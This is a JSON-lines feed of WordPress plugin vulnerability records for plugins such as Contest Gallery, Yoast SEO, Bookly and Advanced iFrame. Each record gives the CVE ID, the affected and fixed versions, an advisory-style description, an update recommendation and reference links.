{"CVE_ID":"CVE-2024-11103","slug":"contest-gallery","versionImpact":"24.0.7","versionEndExcluding":"24.0.8","description":"The Contest Gallery plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 24.0.7. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"Update to version 24.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/trunk\\\/v10\\\/v10-admin\\\/users\\\/frontend\\\/login\\\/ajax\\\/users-login-check-ajax-lost-password.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/trunk\\\/v10\\\/v10-admin\\\/users\\\/frontend\\\/login\\\/ajax\\\/users-login-check-ajax-lost-password.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/trunk\\\/v10\\\/v10-admin\\\/users\\\/frontend\\\/login\\\/ajax\\\/users-login-check-ajax-password-reset.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/trunk\\\/v10\\\/v10-admin\\\/users\\\/frontend\\\/login\\\/ajax\\\/users-login-check-ajax-password-reset.php#L88\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196011\\\/contest-gallery\\\/tags\\\/24.0.8\\\/v10\\\/v10-admin\\\/users\\\/frontend\\\/login\\\/ajax\\\/users-login-check-ajax-lost-password.php?old=3190068&old_path=contest-gallery%2Ftags%2F24.0.7%2Fv10%2Fv10-admin%2Fusers%2Ffrontend%2Flogin%2Fajax%2Fusers-login-check-ajax-lost-password.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196011\\\/contest-gallery\\\/tags\\\/24.0.8\\\/v10\\\/v10-admin\\\/users\\\/frontend\\\/login\\\/ajax\\\/users-login-check-ajax-lost-password.php?old=3190068&old_path=contest-gallery%2Ftags%2F24.0.7%2Fv10%2Fv10-admin%2Fusers%2Ffrontend%2Flogin%2Fajax%2Fusers-login-check-ajax-lost-password.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0df7f413-2631-46d9-8c0b-d66f05a02c01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0df7f413-2631-46d9-8c0b-d66f05a02c01?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10687","slug":"contest-gallery","versionImpact":"24.0.3","versionEndExcluding":"24.0.4","description":"The Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery \u2013 Upload, Vote, Sell via PayPal, Social Share Buttons plugin for WordPress is vulnerable to time-based SQL Injection via the $collectedIds parameter in all versions up to, and including, 24.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 24.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd3b4c44-d47a-45de-bcb2-0820e475b331?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd3b4c44-d47a-45de-bcb2-0820e475b331?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/tags\\\/24.0.1\\\/v10\\\/v10-frontend\\\/ecommerce\\\/ecommerce-get-raw-data-from-galleries.php#L61\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/tags\\\/24.0.1\\\/v10\\\/v10-frontend\\\/ecommerce\\\/ecommerce-get-raw-data-from-galleries.php#L61\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3175299%40contest-gallery%2Ftags%2F24.0.3&new=3180268%40contest-gallery%2Ftags%2F24.0.4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3175299%40contest-gallery%2Ftags%2F24.0.3&new=3180268%40contest-gallery%2Ftags%2F24.0.4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-38792","slug":"conveythis-translate","versionImpact":"234","versionEndExcluding":"235","description":"Missing Authorization vulnerability in ConveyThis Translate Team Language Translate Widget for WordPress \u2013 ConveyThis allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Language Translate Widget for WordPress \u2013 ConveyThis: from n\/a through 234.","recommendation":"Update to version 235, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/conveythis-translate\\\/wordpress-conveythis-translate-plugin-234-non-arbitrary-options-update-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/conveythis-translate\\\/wordpress-conveythis-translate-plugin-234-non-arbitrary-options-update-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5584","slug":"bookly-responsive-appointment-booking-tool","versionImpact":"23.2","versionEndExcluding":"23.3","description":"The WordPress Online Booking and Scheduling Plugin \u2013 Bookly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Color Profile parameter in all versions up to, and including, 23.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with the staff member role and Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 23.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ad9fcd1-b3a3-4711-ad23-d27c3e2091f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ad9fcd1-b3a3-4711-ad23-d27c3e2091f4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookly-responsive-appointment-booking-tool\\\/tags\\\/23.2\\\/backend\\\/modules\\\/staff\\\/resources\\\/js\\\/staff-list.js#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookly-responsive-appointment-booking-tool\\\/tags\\\/23.2\\\/backend\\\/modules\\\/staff\\\/resources\\\/js\\\/staff-list.js#L44\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4984","slug":"wordpress-seo","versionImpact":"22.6","versionEndExcluding":"22.7","description":"The Yoast SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018display_name\u2019 author meta in all versions up to, and including, 22.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 22.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59bcd246-ca2f-4336-9a6e-89afe873ed25?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59bcd246-ca2f-4336-9a6e-89afe873ed25?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/Yoast\\\/wordpress-seo\\\/pull\\\/21334\",\"name\":\"https:\\\/\\\/github.com\\\/Yoast\\\/wordpress-seo\\\/pull\\\/21334\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079234\\\/wordpress-seo\\\/trunk\\\/src\\\/presenters\\\/slack\\\/enhanced-data-presenter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079234\\\/wordpress-seo\\\/trunk\\\/src\\\/presenters\\\/slack\\\/enhanced-data-presenter.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/developer.yoast.com\\\/changelog\\\/yoast-seo\\\/22.7\\\/\",\"name\":\"https:\\\/\\\/developer.yoast.com\\\/changelog\\\/yoast-seo\\\/22.7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5105","slug":"nmedia-user-file-uploader","versionImpact":"22.5","versionEndExcluding":"22.6","description":"The Frontend File Manager Plugin WordPress plugin before 22.6 has a vulnerability that allows an Editor+ user to bypass the file download logic and download files such as `wp-config.php`","recommendation":"Update to version 22.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d40c7108-bad6-4ed3-8539-35c0f57e62cc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d40c7108-bad6-4ed3-8539-35c0f57e62cc\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4041","slug":"wordpress-seo","versionImpact":"22.5","versionEndExcluding":"22.6","description":"The Yoast SEO plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via URLs in all versions up to, and including, 22.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 22.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078555\\\/wordpress-seo\\\/trunk#file129\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078555\\\/wordpress-seo\\\/trunk#file129\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-seo\\\/trunk\\\/inc\\\/class-wpseo-admin-bar-menu.php#L601\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-seo\\\/trunk\\\/inc\\\/class-wpseo-admin-bar-menu.php#L601\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-seo\\\/trunk\\\/inc\\\/class-wpseo-shortlinker.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-seo\\\/trunk\\\/inc\\\/class-wpseo-shortlinker.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-seo\\\/trunk\\\/src\\\/helpers\\\/short-link-helper.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-seo\\\/trunk\\\/src\\\/helpers\\\/short-link-helper.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-seo\\\/trunk\\\/src\\\/helpers\\\/short-link-helper.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-seo\\\/trunk\\\/src\\\/helpers\\\/short-link-helper.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e04b161-3cd0-454d-869c-56f42bd8afb0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e04b161-3cd0-454d-869c-56f42bd8afb0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5209","slug":"bookly-responsive-appointment-booking-tool","versionImpact":"22.4.1","versionEndExcluding":"22.5","description":"The WordPress Online Booking and Scheduling Plugin WordPress plugin before 22.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 22.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dea6077a-81ee-451f-b049-3749a2252c88\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dea6077a-81ee-451f-b049-3749a2252c88\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4691","slug":"bookly-responsive-appointment-booking-tool","versionImpact":"22.3.1","versionEndExcluding":"22.4","description":"The WordPress Online Booking and Scheduling Plugin WordPress plugin before 22.4 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin","recommendation":"Update to version 22.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5085ec75-0795-4004-955d-e71b3d2c26c6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5085ec75-0795-4004-955d-e71b3d2c26c6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7306","slug":"nmedia-user-file-uploader","versionImpact":"21.5","versionEndExcluding":"22.0","description":"The Frontend File Manager Plugin plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the wpfm_delete_multiple_files() function in all versions up to, and including, 21.5. This makes it possible for unauthenticated attackers to delete arbitrary posts.","recommendation":"Update to version 22.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2912124\\\/nmedia-user-file-uploader\\\/trunk\\\/inc\\\/files.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2912124\\\/nmedia-user-file-uploader\\\/trunk\\\/inc\\\/files.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abf422ce-fa03-4bed-a4ec-b31d36de7633?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abf422ce-fa03-4bed-a4ec-b31d36de7633?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1159","slug":"bookly-responsive-appointment-booking-tool","versionEndExcluding":"21.8","description":"The Bookly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via service titles in versions up to, and including, 21.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with administrative privileges to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2913570%40bookly-responsive-appointment-booking-tool&new=2913570%40bookly-responsive-appointment-booking-tool&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2913570%40bookly-responsive-appointment-booking-tool&new=2913570%40bookly-responsive-appointment-booking-tool&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4cdf774-c93b-4b94-85ba-aa56bf401873?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4cdf774-c93b-4b94-85ba-aa56bf401873?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0865","slug":"woocommerce-multiple-customer-addresses","versionEndExcluding":"21.7","description":"The WooCommerce Multiple Customer Addresses & Shipping WordPress plugin before 21.7 does not ensure that the address to add\/update\/retrieve\/delete and duplicate belong to the user making the request, or is from a high privilege users, allowing any authenticated users, such as subscriber to add\/update\/duplicate\/delete as well as retrieve addresses of other users.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e39c0171-ed4a-4143-9a31-c407e3555eec\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e39c0171-ed4a-4143-9a31-c407e3555eec\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1487","slug":"contest-gallery","versionImpact":"21.3.0","versionEndExcluding":"21.3.1","description":"The Photos and Files Contest Gallery WordPress plugin before 21.3.1 does not sanitize and escape some parameters, which could allow users with a role as low as author to perform Cross-Site Scripting attacks.","recommendation":"Update to version 21.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c028cd73-f30a-4c8b-870f-3071055f0496\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c028cd73-f30a-4c8b-870f-3071055f0496\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-24887","slug":"contest-gallery","versionEndExcluding":"21.2.9","description":"Cross-Site Request Forgery (CSRF) vulnerability in Contest Gallery Photos and Files Contest Gallery \u2013 Contact Form, Upload Form, Social Share and Voting Plugin for WordPress. This issue affects Photos and Files Contest Gallery \u2013 Contact Form, Upload Form, Social Share and Voting Plugin for WordPress: from n\/a through 21.2.8.4.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contest-gallery\\\/wordpress-photos-and-files-contest-gallery-plugin-21-2-8-4-csrf-leading-to-gallery-creation-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contest-gallery\\\/wordpress-photos-and-files-contest-gallery-plugin-21-2-8-4-csrf-leading-to-gallery-creation-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5307","slug":"contest-gallery","versionEndExcluding":"21.2.8.1","description":"The Photos and Files Contest Gallery WordPress plugin before 21.2.8.1 does not sanitise and escape some parameters, which could allow unauthenticated users to perform Cross-Site Scripting attacks via certain headers.","recommendation":"Update to version 21.2.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-5307-photos-and-files-contest-gallery-contact-form-21-2-8-1-unauthenticated-stored-xss-via-http-headers\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-5307-photos-and-files-contest-gallery-contact-form-21-2-8-1-unauthenticated-stored-xss-via-http-headers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6fac1e09-21ab-430d-b56d-195e7238c08c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6fac1e09-21ab-430d-b56d-195e7238c08c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13657","slug":"store-locator-widget","versionImpact":"2025r1","versionEndExcluding":"2025r2","description":"The Store Locator Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'storelocatorwidget' shortcode in all versions up to, and including, 20200131 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2025r2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-locator-widget\\\/trunk\\\/store-locator-widget.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-locator-widget\\\/trunk\\\/store-locator-widget.php#L118\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c65b6793-42e3-40cb-a6fe-b000c879d41f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c65b6793-42e3-40cb-a6fe-b000c879d41f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2874","slug":"user-submitted-posts","versionImpact":"20241026","versionEndExcluding":"20250327","description":"The User Submitted Posts \u2013 Enable Users to Submit Posts from the Front End plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 20240319 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 20250327, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3263067%40user-submitted-posts&new=3263067%40user-submitted-posts&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3263067%40user-submitted-posts&new=3263067%40user-submitted-posts&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b212a1a-0e2b-4327-93b5-398bd7a36b5c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b212a1a-0e2b-4327-93b5-398bd7a36b5c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12716","slug":"simple-basic-contact-form","versionImpact":"20240511","versionEndExcluding":"20250114","description":"The Simple Basic Contact Form WordPress plugin before 20250114 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 20250114, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9fa48f1-d7fd-4968-a122-937803f186a2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9fa48f1-d7fd-4968-a122-937803f186a2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8089","slug":"advanced-iframe","versionImpact":"2025.6","versionEndExcluding":"2025.7","description":"The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'additional' parameter in version less than, or equal to, 2025.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2025.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/advanced-iframe.php#L1831\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/advanced-iframe.php#L1831\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3344404%40advanced-iframe&new=3344404%40advanced-iframe&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3344404%40advanced-iframe&new=3344404%40advanced-iframe&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97985b75-6ac9-4aba-8f76-5633418e7907?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97985b75-6ac9-4aba-8f76-5633418e7907?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6987","slug":"advanced-iframe","versionImpact":"2025.5","versionEndExcluding":"2025.6","description":"The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'advanced_iframe' shortcode in all versions up to, and including, 2025.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2025.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/advanced-iframe.php#L725\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/advanced-iframe.php#L725\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-iframe.php#L419\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-iframe.php#L419\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-read-config.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-read-config.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329909\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-read-config.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329909\\\/advanced-iframe\\\/trunk\\\/includes\\\/advanced-iframe-main-read-config.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6acb99eb-d61c-4d1f-b399-32db07c7e3e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6acb99eb-d61c-4d1f-b399-32db07c7e3e7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2815","slug":"administrator-z","versionImpact":"2025.03.24","versionEndExcluding":"2025.03.27","description":"The Administrator Z plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the adminz_import_backup() function in all versions up to, and including, 2025.03.24. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 2025.03.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3262319%40administrator-z&new=3262319%40administrator-z&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3262319%40administrator-z&new=3262319%40administrator-z&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32725074-5c62-49e0-83f9-c6cb77fb77a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32725074-5c62-49e0-83f9-c6cb77fb77a4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1440","slug":"advanced-iframe","versionImpact":"2024.5","versionEndExcluding":"2025.0","description":"The Advanced iFrame plugin for WordPress is vulnerable to unauthorized excessive creation of options on the aip_map_url_callback() function in all versions up to, and including, 2024.5 due to insufficient restrictions. This makes it possible for unauthenticated attackers to update the advancediFrameParameterData option with an excessive amount of unvalidated data.","recommendation":"Update to version 2025.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3255604%40advanced-iframe&new=3255604%40advanced-iframe&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3255604%40advanced-iframe&new=3255604%40advanced-iframe&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b92913fa-aa1e-40a0-9a48-d730b2102217?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b92913fa-aa1e-40a0-9a48-d730b2102217?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
